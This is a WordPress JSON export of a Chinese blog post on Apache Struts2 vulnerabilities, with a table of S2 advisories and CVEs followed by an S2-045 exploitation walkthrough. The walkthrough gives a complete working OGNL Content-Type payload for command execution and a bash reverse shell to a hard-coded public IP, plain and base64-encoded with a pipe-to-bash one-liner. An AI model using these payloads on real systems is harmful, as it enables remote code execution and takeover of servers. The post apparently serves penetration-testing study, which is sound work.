{"id":1520,"date":"2025-01-19T22:22:38","date_gmt":"2025-01-19T14:22:38","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1520"},"modified":"2025-01-19T22:22:39","modified_gmt":"2025-01-19T14:22:39","slug":"01-struts2%e6%bc%8f%e6%b4%9e-2","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/19\/01-struts2%e6%bc%8f%e6%b4%9e-2\/","title":{"rendered":"01.Struts2\u6f0f\u6d1e"},"content":{"rendered":"<h2>\u4e00\u3001Struts2\u7b80\u4ecb<\/h2>\n<p>Apache Struts\u662f\u7f8e\u56fd\u963f\u5e15\u5947\uff08Apache\uff09\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u8d1f\u8d23\u7ef4\u62a4\u7684\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u662f\u4e00\u5957\u7528\u4e8e\u521b\u5efa\u4f01\u4e1a\u7ea7 Java Web \u5e94\u7528\u7684\u5f00\u6e90MVC\u6846\u67b6\uff0c\u4e3b\u8981\u63d0\u4f9b\u4e24\u4e2a\u7248\u672c\u6846\u67b6\u4ea7\u54c1\uff1a Struts1\u548cStruts2\uff1bStruts2\u662f\u4e00\u4e2a\u57fa\u4e8e MVC\u8bbe\u8ba1\u6a21\u5f0f\u7684Web\u5e94\u7528\u6846\u67b6\uff0c\u5b83\u672c\u8d28\u4e0a\u76f8\u5f53\u4e8e\u4e00\u4e2aservlet\uff0c\u5728MVC\u8bbe\u8ba1\u6a21\u5f0f\u4e2d\uff0cStruts2\u4f5c\u4e3a\u63a7\u5236\u5668 (Controller)\u6765\u5efa\u7acb\u6a21\u578b\u4e0e\u89c6\u56fe\u7684\u6570\u636e\u4ea4\u4e92\u3002Struts2\u662fStruts\u7684\u4e0b\u4e00\u4ee3\u4ea7\u54c1\uff0c\u662f\u5728 struts1\u548cWebWork\u7684 \u6280\u672f\u57fa\u7840\u4e0a\u8fdb\u884c\u4e86\u5408\u5e76\u7684\u5168\u65b0\u7684Struts2\u6846\u67b6\u3002<\/p>\n<h2>\u4e8c\u3001Struts2\u5386\u53f2\u6f0f\u6d1e<\/h2>\n<table>\n<thead>\n<tr>\n<th>\u6f0f\u6d1e\u7f16\u53f7<\/th>\n<th>CVE\u7f16\u53f7<\/th>\n<th>\u5f71\u54cd\u7248\u672c<\/th>\n<th>\u53d1\u9001\u6570\u636e<\/th>\n<th>\u5b9e\u73b0\u529f\u80fd<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>S2-001<\/td>\n<td>CVE- 2007-4556<\/td>\n<td>Struts 2.0.0-2.0.8<\/td>\n<td>POST\u8bf7\u6c42\u53d1\u9001\u6570\u636e\uff1b \u9ed8\u8ba4\u53c2\u6570\u4e3a\uff1ausername,password<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u884c\u548c\u53cd\u5f39shell<\/td>\n<\/tr>\n<tr>\n<td>S2-003<\/td>\n<td><\/td>\n<td>Struts 2.0.0-2.0.11.2<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c<\/td>\n<\/tr>\n<tr>\n<td>S2-005<\/td>\n<td>CVE- 2010- 1870<\/td>\n<td>Struts 2.0.0-2.1.8.1<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u8350<\/td>\n<\/tr>\n<tr>\n<td>S2-007<\/td>\n<td>CVE- 2012- 0838<\/td>\n<td>Struts 2.0.0-2.2.3<\/td>\n<td>POST\u8bf7\u6c42\u53d1\u9001\u6570\u636e\uff1b \u9ed8\u8ba4\u53c2\u6570 \u4e3a\uff1ausername,password<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39shell<\/td>\n<\/tr>\n<tr>\n<td>S2-008<\/td>\n<td>CVE- 2012- 0391<\/td>\n<td>Struts 2.1.0-2.3.1<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39 shell<\/td>\n<\/tr>\n<tr>\n<td>S2-009<\/td>\n<td>CVE-2011- 3923<\/td>\n<td>Struts 2.0.0-2.3.1.1<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e\uff0cURL\u540e\u9762 \u9700\u8981\u8bf7\u6c42\u53c2\u6570\u540d\uff1b\u9ed8\u8ba4\u53c2\u6570\uff1a key<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39 shell<\/td>\n<\/tr>\n<tr>\n<td>S2-012<\/td>\n<td>CVE- 2013- 1965<\/td>\n<td>Struts Showcase App 2.0.0-2.3.13<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e\uff0c\u53c2\u6570\u76f4\u63a5 \u6dfb\u52a0\u5230URL\u540e\u9762\uff1b\u9ed8\u8ba4\u53c2\u6570\uff1aname<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39 shell<\/td>\n<\/tr>\n<tr>\n<td>S2- 013\/S2- 014<\/td>\n<td>CVE- 2013- 1966<\/td>\n<td>Struts 2.0.0-2.3.14.1<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u884c\uff0c\u53cd\u5f39shel\u548c\u6587\u4ef6\u4e0a\u4f20<\/td>\n<\/tr>\n<tr>\n<td>S2-015<\/td>\n<td>CVE- 2013- 2135<\/td>\n<td>Struts 2.0.0-2.3.14.2<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39 shell<\/td>\n<\/tr>\n<tr>\n<td>S2-016<\/td>\n<td>CVE-2013- 2251<\/td>\n<td>Struts 2.0.0-2.3.15<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u884c\uff0c\u53cd\u5f39shell\u548c\u6587\u4ef6\u4e0a\u4f20<\/td>\n<\/tr>\n<tr>\n<td>S2-019<\/td>\n<td>CVE- 2013-4316<\/td>\n<td>Struts 2.0.0-2.3.15.1<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u884c\uff0c\u53cd\u5f39shel\u548c\u6587\u4ef6\u4e0a\u4f20<\/td>\n<\/tr>\n<tr>\n<td>S2-020<\/td>\n<td>CVE- 2014- 0094<\/td>\n<td>Struts 2.0.0-2.3.16<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c,\u53cd\u5f39shell \u548c\u6587\u4ef6\u4e0a\u4f20<\/td>\n<\/tr>\n<tr>\n<td>S2-029<\/td>\n<td>CVE- 2016- 0785<\/td>\n<td>Struts 2.0.0- 2.3.24.1\uff08\u9664\u4e86 2.3.20.3)<\/td>\n<td>POST\u8bf7\u6c42\u53d1\u9001\u6570\u636e,\u9700\u8981\u53c2 \u6570; \u9ed8\u8ba4\u53c2\u6570\uff1amessage<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39 shell<\/td>\n<\/tr>\n<tr>\n<td>S2-032<\/td>\n<td>CVE- 2016-3081<\/td>\n<td>Struts 2.3.20- 2.3.28\uff08\u9664\u4e862.3.20.3\u548c2.3.24.3)<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39shell<\/td>\n<\/tr>\n<tr>\n<td>S2-033<\/td>\n<td>CVE- 2016- 3087<\/td>\n<td>Struts 2.3.20- 2.3.28\uff08\u9664\u4e862.3.20.3 \u548c2.3.24.3)<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\u548c\u53cd\u5f39 shell<\/td>\n<\/tr>\n<tr>\n<td>S2-037<\/td>\n<td>CVE-2016- 4438<\/td>\n<td>Struts 2.3.20- 2.3.28.1<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u884c\u548c\u53cd\u5f39shell<\/td>\n<\/tr>\n<tr>\n<td>S2-045<\/td>\n<td>CVE- 2017- 5638<\/td>\n<td>Struts 2.3.5- 2.3.31,2.5-2.5.10<\/td>\n<td>POST\u8bf7\u6c42\u53d1\u9001\u6570\u636e\uff0c\u4e0d\u9700\u8981\u53c2\u6570<\/td>\n<td>\u83b7\u53d6WEB\u8def\u5f84\uff0c\u4efb\u610f\u547d\u4ee4 \u6267\u884c\uff0c\u53cd\u5f39shell\u548c\u6587\u4ef6\u4e0a<\/td>\n<\/tr>\n<tr>\n<td>S2-052<\/td>\n<td>CVE- 2017- 9805<\/td>\n<td>Struts 2.1.2- 2.3.33,2.5-2.5.12<\/td>\n<td>POST\u8bf7\u6c42\u53d1\u9001\u6570\u636e\uff0c\u4e0d\u9700\u8981\u53c2\u6570<\/td>\n<td>\u4f20\u4e13 \u4efb\u610f\u547d\u4ee4\u6267\u884c\uff0c\u53cd\u5f39shell \u548c\u6587\u4ef6\u4e0a\u4f20<\/td>\n<\/tr>\n<tr>\n<td>S2-053<\/td>\n<td>CVE- 2017- 12611<\/td>\n<td>Struts 2.0.1- 2.3.33,2.5-2.5.10<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c\uff0c\u53cd\u5f39shell<\/td>\n<\/tr>\n<tr>\n<td>S2-057<\/td>\n<td>CVE-2018- 11776<\/td>\n<td>Struts 2.3-2.3.34,2.5-2.5.16<\/td>\n<td>GET\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c,\u53cd\u5f39shell<\/td>\n<\/tr>\n<tr>\n<td>S2-059<\/td>\n<td>CVE- 2019- 0230<\/td>\n<td>Struts 2.0.0-2.5.20<\/td>\n<td>POST\u8bf7\u6c42\u53d1\u9001\u6570\u636e<\/td>\n<td>\u4efb\u610f\u547d\u4ee4\u6267\u884c<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u4e09\u3001Struts2\u5386\u53f2\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>1.Struts2\u6846\u67b6\u8bc6\u522b<\/h3>\n<ol>\n<li>\u901a\u8fc7\u7f51\u9875\u540e\u7f00\u6765\u8fdb\u884c\u5224\u65ad\uff0c\u5982 .do\u6216\u8005<\/li>\n<li>\u901a\u8fc7 .action \/struts\/webconsole.html \u662f\u5426\u5b58\u5728\u6765\u8fdb\u884c\u5224\u65ad\uff0c\u9700\u8981 devMode \u4e3a true\u3002<\/li>\n<\/ol>\n<h3>2. Struts2\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177<\/h3>\n<h2>\u56db\u3001Struts2\u5386\u53f2\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>1.Struts 2-045<\/h3>\n<h4>1\uff09\u6f0f\u6d1e\u7b80\u4ecb<\/h4>\n<p>\u5728\u4f7f\u7528\u57fa\u4e8eJakarta\u63d2\u4ef6\u7684\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u65f6\uff0c\u6709\u53ef\u80fd\u5b58\u5728\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\uff0c\u5bfc\u81f4\u7cfb\u7edf\u88ab\u9ed1\u5ba2\u5165\u4fb5\u3002\u6076\u610f \u7528\u6237\u53ef\u5728\u4e0a\u4f20\u6587\u4ef6\u65f6\u901a\u8fc7\u4fee\u6539 HTTP\u8bf7\u6c42\u5934\u4e2d\u7684 Content-Type\u503c\u6765\u89e6\u53d1\u8be5\u6f0f\u6d1e\uff0c\u8fdb\u800c\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002<\/p>\n<h4>2\uff09\u5f71\u54cd\u8303\u56f4<\/h4>\n<p>Struts 2.3.5 \u2013 Struts 2.3.31<br \/>\nStruts 2.5 \u2013 Struts 2.5.10<\/p>\n<h4>3\uff09\u6f0f\u6d1e\u5229\u7528<\/h4>\n<h5>\uff081\uff09\u8bbf\u95ee\u76ee\u6807\u5730\u5740<\/h5>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20250113222043.png\" alt=\"Pasted image 20250113222043.png\"><\/p>\n<h5>\uff082\uff09\u968f\u610f\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\u5e76\u6293\u5305\uff0c\u4fee\u6539Content-Type\u4e3a\u4ee5\u4e0b\u5185\u5bb9<\/h5>\n<pre><code>Content-Type: &quot;%{(#nike='multipart\/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','\/c',#cmd}:{'\/bin\/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&quot;\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20250113222947.png\" alt=\"Pasted image 20250113222947.png\"><\/p>\n<h5>\uff083\uff09\u6784\u9020\u53cd\u5f39Shell\u8bed\u53e5<\/h5>\n<p>Java \u53cd\u5f39shell \u65f6\uff0c\u9700\u8981Base64 \u7f16\u7801\u53cd\u5f39shell \u8bed\u53e5<\/p>\n<pre><code>bash -i &gt;&amp; \/dev\/tcp\/120.79.150.243\/7777 0&gt;&amp;1\n<\/code><\/pre>\n<p>base64\u7f16\u7801:<\/p>\n<pre><code>YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzkuMTUwLjI0My83Nzc3IDA+JjE=\n<\/code><\/pre>\n<p>\u6dfb\u52a0base64 -d\u89e3\u7801\u4e0ebash -i\u6267\u884c\uff1a<\/p>\n<pre><code>echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzkuMTUwLjI0My83Nzc3IDA+JjE=|base64 -d|bash -i\n<\/code><\/pre>\n<h5>\uff084\uff09nc\u76d1\u542c\u5f00\u542f<\/h5>\n<h5>\uff085\uff09\u6784\u9020\u8bf7\u6c42\u5e76\u53d1\u9001<\/h5>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20250113225808-1.png\" alt=\"Pasted image 20250113225808.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20250113230122-1.png\" alt=\"Pasted image 20250113230122.png\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001Struts2\u7b80\u4ecb Apache Struts\u662f\u7f8e\u56fd\u963f\u5e15\u5947\uff08Apache\uff09\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u8d1f\u8d23\u7ef4\u62a4\u7684\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[52,9],"tags":[],"class_list":["post-1520","post","type-post","status-publish","format-standard","hentry","category-52","category-9"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1520"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1520\/revisions"}],"predecessor-version":[{"id":1521,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1520\/revisions\/1521"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1520"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}